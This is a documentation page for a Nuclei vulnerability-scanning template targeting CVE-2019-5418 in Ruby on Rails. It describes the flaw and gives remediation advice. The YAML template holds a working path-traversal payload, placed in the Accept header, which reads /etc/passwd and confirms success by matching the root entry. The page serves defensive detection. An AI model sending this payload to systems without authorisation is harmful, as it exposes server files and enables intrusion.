Skip to content
Nuclei Templates

Rails File Content Disclosure

ID: CVE-2019-5418

Severity: high

Author: omarkurt

Tags: cve,cve2019,rails,lfi,disclosure,edb,rubyonrails

Description

Section titled “Description”

Rails <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 are susceptible to a file content disclosure vulnerability because specially crafted accept headers can cause contents of arbitrary files on the target system’s file system to be exposed.

YAML Source

Section titled “YAML Source”
id: CVE-2019-5418


info:
  name: Rails File Content Disclosure
  author: omarkurt
  severity: high
  description: Rails <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 are susceptible to a file content disclosure vulnerability because specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive information stored on the server.
  remediation: |
    Apply the patch provided by the Rails team or upgrade to a version that includes the fix.
  reference:
    - https://github.com/omarkurt/CVE-2019-5418
    - https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-5418
    - https://www.exploit-db.com/exploits/46585/
    - http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00011.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-5418
    cwe-id: CWE-22,NVD-CWE-noinfo
    epss-score: 0.97426
    epss-percentile: 0.99937
    cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: rubyonrails
    product: rails
    shodan-query: cpe:"cpe:2.3:a:rubyonrails:rails"
  tags: cve,cve2019,rails,lfi,disclosure,edb,rubyonrails


http:
  - method: GET
    path:
      - "{{BaseURL}}"


    headers:
      Accept: ../../../../../../../../etc/passwd{{


    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200
          - 500
# digest: 4a0a0047304502210099b6527dfd26fe722c00618d5649309a12e95b8b672666fb1ebb7818367d006b0220610a1146b73edcaa2dbbc15be6fd1013ffe5f80cf2568e0316b4caa80a90f505:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-5418.yaml"

View on Github